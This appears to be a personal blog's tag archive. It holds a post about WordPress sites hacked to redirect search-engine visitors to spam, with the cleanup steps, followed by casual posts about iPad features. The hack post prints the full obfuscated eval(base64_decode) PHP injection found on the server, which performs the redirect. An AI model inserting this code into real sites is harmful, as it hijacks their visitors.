Tag Archives: iPad

WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our troubleticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire


folder from my old site and then upload the entire


directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. Atleast all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.


I was very worried this morning that I was going to fall head over heels with the new iPad that was coming out today.

I just got my iPad2 last August and I didn’t want to feel behind the game already.

From what I can tell, I’m really not missing out. Not to say that anyone else isn’t, but for how I use my iPad, I definitely don’t need the Retina display or the beefed up camera. And I’m 99% sure it’s packaged with all the same apps (messages + reminders, I don’t think I have this?), so I’m good on that too.

I must say though… Apple invested in some really nice hand models for their marketing imagery.


I might be trumped

So I have relentlessly hated on the iPad because of the lack of a USB drive. I think the announcement of iCloud has bested me. I’ll need to find out more, but it seems to me that if you have iCloud and can push all your data to all your devices… is a USB drive a thing of the past?

To USB or Not To USB? Part 2

iPad2 is completely sold out online and in stores. In New York, a woman sold her physical spot in line outside the Apple store for $900 (http://bit.ly/hWxKDv). She was first in line, but still… Wow. Other customers are waiting almost a month to receive theirs (http://bit.ly/e6yTYM).

I still can’t find any firm information on whether or not it has a USB port. I know that there is a front and back camera, it’s faster and slimmer, the resolution hasn’t improved, and there is no SD slot. What about USB?

I found this, and it’s the best info on USB that I’ve found. It compares the Motorola Xoom and the iPad 2. It says that the Xoom has “many unique features” that are “specifically not available” on iPad 2 (Flash, 4G, SD slot, USB port, and built-in HDMI). I’ve re-read this article several times, and I can’t tell if these “unique features” are available on iPad 2 but don’t come in the standard config, OR if they’re just not available at all. Which seems to be the case because I know you can’t config an iPad to play Flash.

And this one is incredibly confusing. In the Battery Life section, it mentions that you can try and charge your iPad 2 via USB on your computer or laptop, but then later on says that a USB port is “one of the most wished-for features” by users.


Does anyone know, for sure, if there is a USB port on the iPad2??

To USB or Not to USB?

If you took a look at the Apple start page today, you should notice they’re plugging the brand spankin’ new iPad 2. It’s got the camera that everyone knew it needed, but what about a USB port?

According to them:

Once you pick up iPad 2, it’ll be hard to put down. That’s the idea behind the all-new design. It’s 33 percent thinner and up to 15 percent lighter, so it feels even more comfortable in your hands.

This sentence is followed by a superscript 2 (footnote):

Actual size and weight vary by configuration and manufacturing process.

If it’s 33% thinner, how will they fit a USB port? The pictures don’t show a USB port, but that doesn’t mean anything.

Maybe you’ll be able to order a 33% thicker iPad and configure it with USB. Doesn’t sound too bad to me.

For more info on iPad 2, check here.

The new iPad

I know that everyone has their own opinion about what Apple did right or wrong concerning the 2010 release of the iPad. I’ve read some reviews, I’ve looked at the product on the Apple website, and I’ve held my tongue. For long enough. I will finally voice my personal opinion.

1.) It’s more along the lines of a phone than a computer. The interface is the same as the iPhone, not the iMac or the Mac Pro or any of the computer lines. I wanted a tablet computer, not a tablet phone. I do take into consideration that the lines between phone and computer have become more and more blurred, but it is undeniable that the iPad is closer to a phone than a computer. Which brings me to my second point.

2.) 64GB is just not enough. And I realize that 64GB is the largest hard drive it comes with at the moment, but I still say it’s not enough. Sure, that’s a few gigs more than what we have at home on our iBook, but our iBook is also 4 or 5 years old and runs slow. But I suppose that ties in with my first point. 64GB is a lot for phone. It’s not a lot for a computer.

3.) To me, it just screams first generation. I think that by the 3rd or 4th, Mark and I will be in line to buy ours — but right now, it almost seems like a waste of money. Good idea, maybe not excellently executed.

What I wished for was a tablet computer that could run all programs of the Adobe CS4 Web Premium software at the same time, multiple browsers open, with iPhoto & iTunes running. And no lag. That would be a huge feat that graphic designers and artist and all sorts of other people could use and appreciate.

Do I ask for too much?